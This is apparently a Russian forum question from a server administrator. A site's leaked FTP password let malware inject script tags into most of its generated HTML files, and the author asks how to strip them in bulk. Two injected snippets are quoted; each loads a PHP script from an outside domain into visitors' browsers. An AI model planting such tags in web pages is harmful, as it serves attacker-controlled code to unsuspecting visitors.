Есть сервер Убунтовский (12,04).
На нём поднят веб-сервер и заведен с десяток сайтов.
Конфигурация по моему мнению не столь важна, так как проблема в следующем.
Один из сайтов разделён на разделы, что по структуре просто выглядит как папки.
primer.ru/razdel1
primer.ru/razdel2
primer.ru/razdel3
Ввиду того, что на этом сайте в админке в какой-то момент вышел из строя файловый менеджер, а прошлому веб-разработчику было вломак его чинить, он просто поднял на нём ФТП и раздал всем логины/пароли с правами на определённые разделы. Ну чтобы они картинки могли заливать.
Один из юзверей где-то засветил пароль и через него в один из разделов, на который был full control влез вирус. Пароль, да и имя естесственно сразу поменяли.
Сразу - это как только пользователи обнаружили, что Яндекс блокирует переходы из поисковика. Т.е. первую неделю они думали, что само пройдёт. Вторую, они вспоминали мой емэйл. Третью формулировали предложение. Ну в общем через месяц.
Суть cms-ки в том, что она в зависимости от раздела просто генерирует файлики *.html. И вирус почти в каждый этот файлик вписал следующий код:
Пример №1. <!--
cf774c--><script type="text/javascript" src="
http://domenvirusa.ru/crbjfywb.php?id=3416307"></script><!--/
cf774c-->
Пример №2. <!--
ed14b7--><script type="text/javascript" src="
http://domenvirusa.ru/crbjfywb.php?id=3417946"></script><!--/
ed14b7-->
Как видно, выделенные жирным части кода меняются. Могу ошибаться, но вроде ещё встречал разные названия пхп-файлов.
Итак, вопрос
Как можно быстро почистить эту хрень?
Есть доступ как по SSH так и по FTP с правами Full Control.
Но вручную я уже слегка одурел это делать.